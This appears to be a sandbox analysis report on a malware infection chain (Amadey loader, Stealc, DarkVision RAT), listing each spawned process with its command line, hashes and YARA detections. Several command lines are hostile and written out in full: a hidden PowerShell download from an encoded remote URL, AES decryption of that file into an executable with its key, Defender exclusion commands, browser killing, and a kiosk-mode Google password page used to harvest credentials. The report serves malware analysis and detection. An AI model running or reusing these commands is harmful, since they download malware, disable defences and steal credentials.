2024-12-09 07:09:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:06:54
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfe0000
File size:	3'248'128 bytes
MD5 hash:	22BF111E0FFBCE40DA98521C8AC390AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:06:57
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x950000
File size:	3'248'128 bytes
MD5 hash:	22BF111E0FFBCE40DA98521C8AC390AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:06:57
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x950000
File size:	3'248'128 bytes
MD5 hash:	22BF111E0FFBCE40DA98521C8AC390AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:08:00
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x950000
File size:	3'248'128 bytes
MD5 hash:	22BF111E0FFBCE40DA98521C8AC390AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:08:09
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
Imagebase:	0x140000000
File size:	124'416 bytes
MD5 hash:	A3D68745E8919E2A48D8FA0738DA124E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:08:10
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
Imagebase:	0x7ff720f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:08:10
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:08:10
Start date:	09/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net session
Imagebase:	0x7ff7a9330000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:08:10
Start date:	09/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 session
Imagebase:	0x7ff64f2a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:08:10
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:08:13
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:08:18
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Imagebase:	0x450000
File size:	1'856'000 bytes
MD5 hash:	F15A88B85AFA75FB85FB70E83071E286
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	02:08:26
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"
Imagebase:	0x110000
File size:	1'784'320 bytes
MD5 hash:	1CCD476EF1CB8A55170A6EF196DFB053
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2936414035.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2948007674.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000003.2593857071.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	02:08:30
Start date:	09/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 10 /nobreak
Imagebase:	0x7ff7b1750000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:08:33
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Imagebase:	0x450000
File size:	1'856'000 bytes
MD5 hash:	F15A88B85AFA75FB85FB70E83071E286
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:08:33
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"
Imagebase:	0xe70000
File size:	970'752 bytes
MD5 hash:	03C3B35F938A1BC015E2579A7FB58015
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:08:34
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:08:34
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:08:36
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:08:36
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:08:36
Start date:	09/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:08:37
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:08:39
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	02:08:39
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2232 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6813d85d-2975-43c3-861c-97300b67dc7e} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced46f310 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:08:40
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000002.2751422689.0000027FE834F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000002.2751422689.0000027FE825C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	02:08:41
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"
Imagebase:	0x110000
File size:	1'784'320 bytes
MD5 hash:	1CCD476EF1CB8A55170A6EF196DFB053
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000003.2750899040.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.2936545464.0000000000111000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	02:08:41
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2696 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 3676 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37a942e1-c472-431e-9fe3-e3010ecc3e75} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced484b10 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:08:45
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\downloaded_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Imagebase:	0xcd0000
File size:	515'584 bytes
MD5 hash:	D60C9E070239F8C240AAA6D8832E11EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000003.2764516501.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.2782167786.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000000.2762690548.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.2778572701.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:08:45
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Imagebase:	0x7ff720f10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:08:45
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:08:45
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:08:45
Start date:	09/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe"
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002C.00000002.2941880948.0000000000AE8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	02:08:47
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe"
Imagebase:	0xbc0000
File size:	2'724'864 bytes
MD5 hash:	A45A51347A496E17A3427A34E1B27447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	02:08:50
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"
Imagebase:	0xe70000
File size:	970'752 bytes
MD5 hash:	03C3B35F938A1BC015E2579A7FB58015
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	02:08:53
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xb80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:08:54
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:08:56
Start date:	09/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	02:08:58
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Imagebase:	0x450000
File size:	1'856'000 bytes
MD5 hash:	F15A88B85AFA75FB85FB70E83071E286
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	754
Total number of Limit Nodes:	16

Executed Functions

Function 0101652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0101652A,?,?,?,?,?,01017661), ref: 01016567

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
